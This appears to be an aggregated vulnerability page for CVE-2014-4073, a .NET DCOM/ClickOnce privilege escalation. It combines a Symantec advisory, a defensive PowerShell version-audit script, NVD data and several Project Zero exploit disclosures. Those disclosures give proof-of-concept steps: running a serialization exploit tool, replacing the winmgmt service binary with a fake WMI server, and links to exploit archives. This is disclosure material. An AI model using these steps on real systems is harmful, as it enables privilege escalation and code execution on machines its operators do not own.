Microsoft .NET Framework ClickOnce CVE-2014-4073 Remote Privilege Escalation Vulnerability
2014-10-14T00:00:00
ID: SMNTC-70313. Type: symantec. Reporter: Symantec Security Response. Modified: 2014-10-14T00:00:00
Description
Microsoft .NET Framework is prone to a remote privilege-escalation vulnerability. An attacker can exploit this issue to gain elevated privileges within the context of the application; this can result in the attacker gaining complete control of the affected system.
Technologies Affected
Avaya CallPilot 4.0
Avaya CallPilot 4.0.1
Avaya CallPilot 5.0
Avaya CallPilot 5.0.1
Avaya CallPilot 5.1.0
Avaya Communication Server 1000 Telephony Manager 3.0
Avaya Communication Server 1000 Telephony Manager 3.0.1
Avaya Communication Server 1000 Telephony Manager 4.0
Avaya Communication Server 1000 Telephony Manager 4.0.1
Avaya Conferencing Standard Edition 6.0
Avaya Conferencing Standard Edition 6.0 SP1
Avaya Conferencing Standard Edition 6.0.1
Avaya Meeting Exchange - Client Registration Server 5.0
Avaya Meeting Exchange - Client Registration Server 5.0.1
Avaya Meeting Exchange - Client Registration Server 5.2
Avaya Meeting Exchange - Client Registration Server 5.2.1
Avaya Meeting Exchange - Client Registration Server 6.0
Avaya Meeting Exchange - Client Registration Server 6.2
Avaya Meeting Exchange - Recording Server 5.0
Avaya Meeting Exchange - Recording Server 5.0.1
Avaya Meeting Exchange - Recording Server 5.2
Avaya Meeting Exchange - Recording Server 5.2.1
Avaya Meeting Exchange - Recording Server 6.0
Avaya Meeting Exchange - Recording Server 6.2
Avaya Meeting Exchange - Streaming Server 5.0
Avaya Meeting Exchange - Streaming Server 5.0.1
Avaya Meeting Exchange - Streaming Server 5.2
Avaya Meeting Exchange - Streaming Server 5.2.1
Avaya Meeting Exchange - Streaming Server 6.0
Avaya Meeting Exchange - Streaming Server 6.2
Avaya Meeting Exchange - Web Conferencing Server 5.0
Avaya Meeting Exchange - Web Conferencing Server 5.0.1
Avaya Meeting Exchange - Web Conferencing Server 5.2
Avaya Meeting Exchange - Web Conferencing Server 5.2.1
Avaya Meeting Exchange - Web Conferencing Server 6.0
Avaya Meeting Exchange - Web Conferencing Server 6.2
Avaya Meeting Exchange - Webportal 5.0
Avaya Meeting Exchange - Webportal 5.0.1
Avaya Meeting Exchange - Webportal 5.2
Avaya Meeting Exchange - Webportal 5.2.1
Avaya Meeting Exchange - Webportal 6.0
Avaya Meeting Exchange - Webportal 6.2
Avaya Messaging Application Server 5
Avaya Messaging Application Server 5.0
Avaya Messaging Application Server 5.0.1
Avaya Messaging Application Server 5.2
Avaya Messaging Application Server 5.2.1
Microsoft .NET Framework 2.0 SP2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.0
Microsoft .NET Framework 4.5
Microsoft .NET Framework 4.5.1
Microsoft .NET Framework 4.5.2
Recommendations
Block external access at the network boundary, unless external parties require service.
Filter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.
Updates are available. Please see the references or vendor advisory for more information.
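The advisory names the affected .NET Framework versions but gives no way to inventory a host against that list. The PowerShell below is an added example, not part of the Symantec advisory: it reads the NDP setup registry keys and flags any installed framework whose version matches the list above. It assumes it runs with administrator rights on the host being checked, that .NET 3.5 SP1 is the build the advisory lists as "3.5.1", and it uses Microsoft's documented Release DWORD values for 4.5, 4.5.1 and 4.5.2.

```powershell
# Added audit example (not part of the Symantec advisory): report installed .NET Framework
# versions and flag those the advisory lists as affected by CVE-2014-4073.
# Assumptions: run as administrator on the Windows host being checked; .NET 3.5 SP1 is
# treated as the "3.5.1" entry; Release DWORD thresholds are Microsoft's published values.

$Affected = @('2.0 SP2', '3.5', '3.5.1', '4.0', '4.5', '4.5.1', '4.5.2')   # taken from the advisory

# Minimum Release DWORD per .NET 4.5.x version (Microsoft-documented); checked highest first.
$ReleaseTable = @(
    @{ Min = 393295; Version = '4.6 or later' },
    @{ Min = 379893; Version = '4.5.2' },
    @{ Min = 378675; Version = '4.5.1' },
    @{ Min = 378389; Version = '4.5' }
)

function Get-DotNetFrameworkVersions {
    $base  = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'
    $found = @()

    # .NET 2.0 and 3.5 register under their own keys; the SP value carries the service pack.
    foreach ($key in 'v2.0.50727', 'v3.5') {
        $p = Join-Path $base $key
        if (Test-Path $p) {
            $props = Get-ItemProperty -Path $p
            if ($props.Install -eq 1) {
                if ($key -eq 'v3.5') {
                    # Assumption: 3.5 SP1 corresponds to the advisory's "3.5.1" entry.
                    $found += $(if ($props.SP -ge 1) { '3.5.1' } else { '3.5' })
                } else {
                    $found += $(if ($props.SP -ge 1) { "2.0 SP$($props.SP)" } else { '2.0' })
                }
            }
        }
    }

    # .NET 4.x installs in place under v4\Full; plain 4.0 has no Release DWORD, 4.5+ does.
    $p4 = Join-Path $base 'v4\Full'
    if (Test-Path $p4) {
        $props = Get-ItemProperty -Path $p4
        if ($props.Install -eq 1) {
            $ver = '4.0'
            if ($props.PSObject.Properties['Release']) {
                foreach ($row in $ReleaseTable) {
                    if ($props.Release -ge $row.Min) { $ver = $row.Version; break }
                }
            }
            $found += $ver
        }
    }
    return $found
}

function Test-AffectedByCVE20144073 {
    param([string[]]$Installed)
    foreach ($v in $Installed) {
        [pscustomobject]@{
            Version  = $v
            Affected = ($Affected -contains $v)   # true when the advisory lists this version
        }
    }
}

$installed = Get-DotNetFrameworkVersions
Test-AffectedByCVE20144073 -Installed $installed | Format-Table -AutoSize
```

A version match only means the framework family is in the advisory's list; the fix ships as an update to that same version, so confirm the vendor update is installed rather than relying on the version string alone.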
{"cve": [{"lastseen": "2020-10-03T12:01:17", "description": "Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, 4.5, 4.5.1, and 4.5.2 processes unverified data during interaction with the ClickOnce installer, which allows remote attackers to gain privileges via vectors involving Internet Explorer, aka \".NET ClickOnce Elevation of Privilege Vulnerability.\"", "edition": 3, "cvss3": {}, "published": "2014-10-15T10:55:00", "title": "CVE-2014-4073", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4073"], "modified": "2018-10-12T22:06:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.0", "cpe:/a:microsoft:.net_framework:4.5.1", "cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:4.5", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:2.0", "cpe:/a:microsoft:.net_framework:4.5.2"], "id": "CVE-2014-4073", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4073", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRealtek 
Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation", "edition": 1, "published": "2017-04-25T00:00:00", "title": "Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073"], "modified": "2017-04-25T00:00:00", "id": "EXPLOITPACK:0591D13824805C54C94555FCAB81B9EE", "href": "", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075\n\nWindows: Dolby Audio X2 Service Elevation of Privilege\nPlatform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.\nClass: Elevation of Privilege\n\nSummary:\nThe DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.\n\nDescription:\n\nThe DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There\u2019s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.\n\nMicrosoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.\n\nProof of Concept:\n\nTo demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. 
The executable to use is ExploitDotNetDCOMSerialization.exe.\n\n1) From a command prompt run the command \u201cExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad\u201d \n2) Check the currently running processes for the privileged copy of notepad,\n\nExpected Result:\nNo privilege escalation occurs.\n\nObserved Result:\nAn instance of notepad is running at system privileges.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41933.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution", "edition": 1, "published": "2017-04-20T00:00:00", "title": "Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073"], "modified": "2017-04-20T00:00:00", "id": "EXPLOITPACK:7D4B2BDADA62BAA8E8BF6E13B9C4CE9F", "href": "", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1081\n\nWindows: ManagementObject Arbitrary .NET Serialization RCE\nPlatform: .NET 4.6, Powershell 4. Tested between Server 2016 and Windows 10 Anniversary Edition\nClass: Remote Code Execution\n\nSummary:\nAccessing a compromised WMI server over DCOM using System.Management classes or the Powershell Get-WmiObject Cmdlet can lead to the server running arbitrary code on the calling machine leading to RCE.\n\nDescription:\n\nThe dangers of using .NET for DCOM are well know, the SRD blog made a post (https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/) which explicitly said it shouldn\u2019t be used between trust boundaries. Presumably people took this to mean implementing servers, but it\u2019s also a risk if a .NET DCOM client connects to an untrusted endpoint. 
This is due to the IManagedObject interface which will automatically force a client to deserialize an untrusted BinaryFormatter stream which is known bad.\n\nOne common use of DCOM in the .NET framework is for WMI access. The old classes in the System.Management namespace are still accessible (even though technically supersceded by Cim classes) and in powershell they act as the backend for Get-WmiObject and family. Through inspection it\u2019s clear that a number of places the client querys for IManagedObject (for example on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin method) and would be vulnerable. If this interface is being queried it means that a .NET client is trying to create an RCW and will try and create a local copy of a remote serializable object.\n\nTherefore in corporate scenarios where some central system is using WMI over DCOM for management and analysis of running systems (and the management code is using the old .NET/PS classes to do the calls) a compromised machine which replaces the WMI service with its own malicious one could get arbitrary code execution on the monitoring machine. As this is typically going to be a higher privileged account (due to the requirements of DCOM access) it probably makes it more serious.\n\nLooking at the network traffic the initial CreateInstance call on the remote activator is only using CONNECT level authentication. This means that it might also be possible to MITM (or Man-At-The-Side) a .NET WMI client and send it back a malicious COM objref to get it to communicate with the attacker's server. \n\nOf course ideally no one would do this, or use the old style .NET and PS commands. But I\u2019m sure there are networks out there which do so.\n\nProof of Concept:\n\nI\u2019ve provided a PoC as a C# project. You\u2019ll need to also set up some machines to test this out. I\u2019ve tested it in a simple environment of a Server 2016 server acting as a DC and a Windows 10 client. 
The serialized stream is tailored specifically for 4.6, I don\u2019t know if it works anywhere else.\n\n1) Compile the C# project and copy the binary to c:\\service\\FakeWmiServer.exe on the Client machine.\n2) Run the following commands in admin Powershell on the client machine to configure the WMI service and add the server executable to the firewall.\n\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Inbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Outbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\nsc.exe config winmgmt binPath= c:\\service\\FakeWMIService.exe type= own\nRestart-Service winmgmt -Force\n\n3) On the server start powershell.\n4) On the server execute the PS command \u201cGet-WmiObject -Class Win32_Process -ComputerName hostname\u201d replacing hostname with the address of the client.\n\nExpected Result:\nWMI connection fails.\n\nObserved Result:\nA copy of CMD and Notepad is executed on the server in the context of the calling user.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41903.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows 10 - COM Desktop Broker Privilege Escalation", "edition": 1, "published": "2019-01-14T00:00:00", "title": "Microsoft Windows 10 - COM Desktop Broker Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073"], "modified": "2019-01-14T00:00:00", "id": "EXPLOITPACK:72919B3D352BE95E4523CEA502D5EAA0", "href": "", "sourceData": "Windows: COM Desktop Broker Elevation of Privilege\nPlatform: Windows 10 1809 (almost certainly earlier versions as well).\nClass: 
Elevation of Privilege\nSecurity Boundary (per Windows Security Service Criteria): AppContainer Sandbox\n\nSummary: \n\nThe COM Desktop Broker doesn\u2019t correctly check permissions resulting in elevation of privilege and sandbox escape.\n\nDescription:\nWindows 10 introduced \u201cBrokered Windows Runtime Components for side-loaded applications\u201d which allows a UWP application to interact with privileged components by allowing developers to write a custom broker in .NET. Rather than handling this with the existing Runtime Broker a new \u201cDesktop Broker\u201d was created and plumbed into the COM infrastructure. This required changes in COMBASE to instantiate the broker class and RPCSS to control access to the broker.\n\nThe stated purpose is only for use by sideloaded enterprise applications, specifically .NET based ones. Looking at the checks in RPCSS for the activation of the broker we can see the check as follows:\n\nHRESULT IsSideLoadedPackage(LPCWSTR *package_name, bool *is_sideloaded) {\n PackageOrigin origin;\n *is_sideloaded = false;\n HRESULT hr = GetStagedPackageOrigin(package_name, &origin);\n if (FAILED(hr))\n return hr;\n \n *is_sideloaded = origin != PackageOrigin_Store;\n return S_OK;\n}\n\nThis check is interesting because it considered anything to be sideloaded that hasn\u2019t come from the Store. Looking at the PackageOrigin enumeration this includes Inbox applications such as Cortana and Edge both of which process potentially untrusted content from the network. Of course this isn\u2019t an issue if the broker is secure, but\u2026\n\nFor a start, as long as RPCSS thinks the current package is side-loaded this feature doesn\u2019t require any further capability to use, or at least nothing checks for one during the process. 
Even in the side loading case this isn\u2019t ideal, it means that even though a side loaded application is in the sandbox this would allow the application to escape without giving the installer of the application any notice that it has effectively full trust. Contrast this with Desktop Bridge UWP applications which require the \u201cfullTrust\u201d capability to invoke a Win32 application outside the sandbox. This is even more important for a sandbox escape from an Inbox application as you can\u2019t change the capabilities at all without having privileged access. Now, technically you\u2019re supposed to have the appropriate configuration inside the application\u2019s manifest to use this, but that only applies if you\u2019re activating through standard COM Runtime activation routes, instead you can just create an instance of the broker\u2019s class (which is stored in the registry, but at least seems to always be C8FFC414-946D-4E61-A302-9B9713F84448). This class is running in a DLL surrogate at normal user privileges. Therefore any issue with this interface is a sandbox escape. The call implements a single interface, IWinRTDesktopBroker, which looks like:\n\nclass IWinRTDesktopBroker : public IUnknown {\n HRESULT GetClassActivatorForApplication(HSTRING dir, IWinRTClassActivator** ppv);\n};\n\nThis interface has only one method, GetClassActivatorForApplication which takes the path to the brokered components directory. No verification of this directory takes place, it can be anywhere you specify. I\u2019d have assumed it might have at least been limited to a special subdirectory of the package installation, but I\u2019d clearly be wrong. 
Passing an arbitrary directory to this method, you get back the following interface:\n\nclass IWinRTClassActivator : public IUnknown {\n HRESULT ActivateInstance(HSTRING activatableClassId, IInspectable** ppv);\n HRESULT GetActivationFactory(HSTRING activatableClassId, REFIID riid, IUnknown** ppv);\n};\n\nSo to escape the sandbox with this you can create directory somewhere, copy in a WinRT component winmd file then activate it. The activation process will run class constructors and give you arbitrary code execution outside the sandbox. \n\nHowever, even if the directory was checked in some way as long as you can get back the IWinRTClassActivator interface you could still escape the sandbox as the object is actually an instance of the System.Runtime.InteropServices.WindowsRuntime.WinRTClassActivator class which is implemented by the .NET BCL. This means that it exposes a managed DCOM object to a low-privileged caller which is pretty simple to exploit using my old serialization attacks (e.g. MSRC case 37122). The funny thing is MSRC wrote a blog post [1] about not using Managed DCOM across security boundaries almost certainly before this code was implemented but clearly it wasn\u2019t understood.\n[1] https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/\n\nThere are some caveats, as far as I can tell you can\u2019t create this broker from an LPAC Edge content process, more because the connection to the broker fails rather than any activation permissions check. Therefore to exploit from Edge you\u2019d need to get into the MicrosoftEdge process (or another process outside of LPAC). This is left as an exercise for the reader.\n\nFixing wise, I\u2019d guess unless you\u2019re actually using this for Inbox applications at a minimum you probably should only Developer and LOB origins. Ideally you\u2019d probably want to require a capability for its use but the horse may have bolted on that one. 
Anyway you might not consider this an issue as it can\u2019t easily be used from LPAC and side-loading is an issue unto itself.\n\nProof of Concept:\n\nI\u2019ve provided a PoC as a solution containing the C# PoC and Brokered Component as well as a DLL which can be injected into Edge to demonstrate the issue. The PoC will inject the DLL into a running MicrosoftEdge process and run the attack. Note that the PoC needs to know the relative location of the ntdll!LdrpKnownDllDirectoryHandle symbol for x64 in order to work. It should be set up for the initial release of RS5 (17763.1) but if you need to run it on another machine you\u2019ll need to modify GetHandleAddress in the PoC to check the version string from NTDLL and return the appropriate location (you can get the offset in WinDBG using \u2018? ntdll!LdrpKnownDllDirectoryHandle-ntdll). Also before you ask, the injection isn\u2019t a CIG bypass you need to be able to create an image section from an arbitrary file to perform the injection which you can do inside a process running with CIG.\n\n1) Compile the solution in \u201cRelease\u201d mode for \u201cAny CPU\u201d. It\u2019ll need to pull NtApiDotNet from NuGet to build.\n2) Start a copy of Edge.\n3) Execute the PoC from the x64\\Release directory.\n\nExpected Result:\nCreating the broker fails.\n\nObserved Result:\nThe broker creation succeeds and notepad executes outside the sandbox.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46162.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T11:59:51", "description": "Windows: ManagementObject Arbitrary .NET Serialization RCE\r\nPlatform: .NET 4.6, Powershell 4. 
Tested between Server 2016 and Windows 10 Anniversary Edition \r\nClass: Remote Code Execution\r\n\r\n#### Summary:\r\nAccessing a compromised WMI server over DCOM using System.Management classes or the Powershell Get-WmiObject Cmdlet can lead to the server running arbitrary code on the calling machine leading to RCE.\r\n\r\n#### Description:\r\n\r\nThe dangers of using .NET for DCOM are well know, the SRD blog made a post (https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/) which explicitly said it shouldn\u2019t be used between trust boundaries. Presumably people took this to mean implementing servers, but it\u2019s also a risk if a .NET DCOM client connects to an untrusted endpoint. This is due to the IManagedObject interface which will automatically force a client to deserialize an untrusted BinaryFormatter stream which is known bad.\r\n\r\nOne common use of DCOM in the .NET framework is for WMI access. The old classes in the System.Management namespace are still accessible (even though technically supersceded by Cim classes) and in powershell they act as the backend for Get-WmiObject and family. Through inspection it\u2019s clear that a number of places the client querys for IManagedObject (for example on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin method) and would be vulnerable. If this interface is being queried it means that a .NET client is trying to create an RCW and will try and create a local copy of a remote serializable object.\r\n\r\nTherefore in corporate scenarios where some central system is using WMI over DCOM for management and analysis of running systems (and the management code is using the old .NET/PS classes to do the calls) a compromised machine which replaces the WMI service with its own malicious one could get arbitrary code execution on the monitoring machine. 
As this is typically going to be a higher privileged account (due to the requirements of DCOM access) it probably makes it more serious.\r\n\r\nLooking at the network traffic the initial CreateInstance call on the remote activator is only using CONNECT level authentication. This means that it might also be possible to MITM (or Man-At-The-Side) a .NET WMI client and send it back a malicious COM objref to get it to communicate with the attacker's server. \r\n\r\nOf course ideally no one would do this, or use the old style .NET and PS commands. But I\u2019m sure there are networks out there which do so.\r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# project. You\u2019ll need to also set up some machines to test this out. I\u2019ve tested it in a simple environment of a Server 2016 server acting as a DC and a Windows 10 client. The serialized stream is tailored specifically for 4.6, I don\u2019t know if it works anywhere else.\r\n\r\n1) Compile the C# project and copy the binary to c:\\service\\FakeWmiServer.exe on the Client machine.\r\n2) Run the following commands in admin Powershell on the client machine to configure the WMI service and add the server executable to the firewall.\r\n\r\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Inbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\r\nNew-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Outbound -Program C:\\service\\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any\r\nsc.exe config winmgmt binPath= c:\\service\\FakeWMIService.exe type= own\r\nRestart-Service winmgmt -Force\r\n\r\n3) On the server start powershell.\r\n4) On the server execute the PS command \u201cGet-WmiObject -Class Win32_Process -ComputerName hostname\u201d replacing hostname with the address of the client.\r\n\r\nExpected Result: \r\nWMI 
connection fails.\r\n\r\nObserved Result: \r\nA copy of CMD and Notepad is executed on the server in the context of the calling user.", "published": "2017-04-19T00:00:00", "type": "seebug", "title": "Windows: ManagementObject Arbitrary .NET Serialization RCE\uff08CVE-2017-0160\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073", "CVE-2017-0160"], "modified": "2017-04-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92967", "id": "SSV:92967", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:57:55", "description": "Windows: Dolby Audio X2 Service Elevation of Privilege \r\nPlatform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016. \r\nClass: Elevation of Privilege \r\n\r\n#### Summary: \r\nThe DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.\r\n\r\n#### Description: \r\n\r\nThe DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There\u2019s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.\r\n\r\nMicrosoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.\r\n\r\nProof of Concept: \r\n\r\nTo demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. 
The executable to use is ExploitDotNetDCOMSerialization.exe.\r\n\r\n1) From a command prompt run the command \u201cExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad\u201d \r\n2) Check the currently running processes for the privileged copy of notepad,\r\n\r\nExpected Result: \r\nNo privilege escalation occurs.\r\n\r\nObserved Result:\r\nAn instance of notepad is running at system privileges.", "published": "2017-04-27T00:00:00", "type": "seebug", "title": "Windows: Dolby Audio X2 Service EoP (CVE-2017-7293)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073", "CVE-2017-7293"], "modified": "2017-04-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93058", "id": "SSV:93058", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-04-25T20:47:25", "description": "Windows 10 Realtek Audio Driver 6.0.1.7898 - Dolby Audio X2 Service Privilege Escalation. CVE-2017-7293. Local exploit for Windows platform", "published": "2017-04-25T00:00:00", "type": "exploitdb", "title": "Windows 10 Realtek Audio Driver 6.0.1.7898 - Dolby Audio X2 Service Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4073", "CVE-2017-7293"], "modified": "2017-04-25T00:00:00", "id": "EDB-ID:41933", "href": "https://www.exploit-db.com/exploits/41933/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075\r\n\r\nWindows: Dolby Audio X2 Service Elevation of Privilege\r\nPlatform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). 
Version of the service binary 0.7.2.61 built on 7/18/2016.\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nThe DAX2API service installed as part of the Realtek Audio Driver on Windows 10 is vulnerable to a privilege escalation vulnerability which allows a normal user to get arbitrary system privileges.\r\n\r\nDescription:\r\n\r\nThe DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There\u2019s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.\r\n\r\nMicrosoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.\r\n\r\nProof of Concept:\r\n\r\nTo demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. 
The executable to use is ExploitDotNetDCOMSerialization.exe.\r\n\r\n1) From a command prompt run the command \u201cExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad\u201d \r\n2) Check the currently running processes for the privileged copy of notepad,\r\n\r\nExpected Result:\r\nNo privilege escalation occurs.\r\n\r\nObserved Result:\r\nAn instance of notepad is running at system privileges.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41933.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41933/"}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:37", "bulletinFamily": "info", "cvelist": ["CVE-2014-0257", "CVE-2014-4073", "CVE-2017-7293"], "description": "Posted by James Forshaw, Project Zero\n\n** \n**\n\nOne of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they\u2019re difficult for a developer to mitigate outside of not using that technology, something which isn\u2019t always possible.\n\n** \n**\n\nI discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which make the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability. 
## A Little Bit of Background Knowledge

If you look at the history of .NET, many of its early underpinnings were attempts to make a better version of COM (for a quick history lesson it’s worth watching [this short video](<https://channel9.msdn.com/blogs/thechannel9team/anders-hejlsberg-what-brought-about-the-birth-of-the-clr>) of Anders Hejlsberg discussing .NET). This led to Microsoft placing a large focus on ensuring that while .NET itself might not be COM it must be able to interoperate with COM. Therefore .NET can be used both to implement and to consume COM objects. For example, instead of calling QueryInterface on a COM object you can just cast an object to a COM compatible interface. Implementing an out-of-process COM server in C# is as simple as the following:

```csharp
using System;
using System.Runtime.InteropServices;

// Define COM interface.
[ComVisible(true)]
[InterfaceType(ComInterfaceType.InterfaceIsIDispatch)]
[Guid("3D2392CB-2273-4A76-9C5D-B2C8A3120257")]
public interface ICustomInterface {
    void DoSomething();
}

// Define COM class implementing interface.
[ComVisible(true)]
[Guid("8BC3F05E-D86B-11D0-A075-00C04FB68820")]
public class COMObject : ICustomInterface {
    public void DoSomething() {}
}

class Program {
    static void Main() {
        // Register COM class with COM services.
        RegistrationServices reg = new RegistrationServices();
        int cookie = reg.RegisterTypeForComClients(
            typeof(COMObject),
            RegistrationClassContext.LocalServer
            | RegistrationClassContext.RemoteServer,
            RegistrationConnectionType.MultipleUse);

        // Keep the server process alive until a key is pressed.
        Console.ReadLine();
        reg.UnregisterTypeForComClients(cookie);
    }
}
```

